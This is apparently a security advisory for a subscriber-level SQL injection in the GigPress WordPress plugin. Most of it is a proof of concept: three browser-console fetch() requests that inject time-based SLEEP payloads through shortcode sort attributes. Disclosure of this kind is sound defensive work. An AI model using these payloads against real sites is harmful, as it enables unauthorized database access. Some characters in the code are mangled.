GigPress <= 2.3.28 - Subscriber+ SQLi

The plugin does not validate and escape some of its shortcode attributes before using them in SQL statement/s, which could allow any authenticated users, such as subscriber to perform SQL Injection attacks

PoC

Run the below commands in the developer console of the web browser while being on the blog as a subscriber user and note the delayed responses Via gigpress_menu shortcode, 5s delay fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “method”: “POST”, “body”: “action=parse-media-shortcode&shortcode;=[gigpress_menu sort=’ AND (SELECT 42 FROM (SELECT(SLEEP(5)))b)']”, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data)); Via gigpress_shows shortcode, 3s delay fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “method”: “POST”, “body”: “action=parse-media-shortcode&shortcode;=[gigpress_shows group_artists=‘no’ sort=’ AND (SELECT 42 FROM (SELECT(SLEEP(1)))b)']”, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data)); Via gigpress_related_shows shortcode, 6s delay: fetch(“/wp-admin/admin-ajax.php”, { “headers”: { “content-type”: “application/x-www-form-urlencoded”, }, “method”: “POST”, “body”: “action=parse-media-shortcode&post;_ID=1&shortcode;=[gigpress_related_shows sort=’ AND (SELECT 42 FROM (SELECT(SLEEP(2)))b)']”, “credentials”: “include” }).then(response => response.text()) .then(data => console.log(data));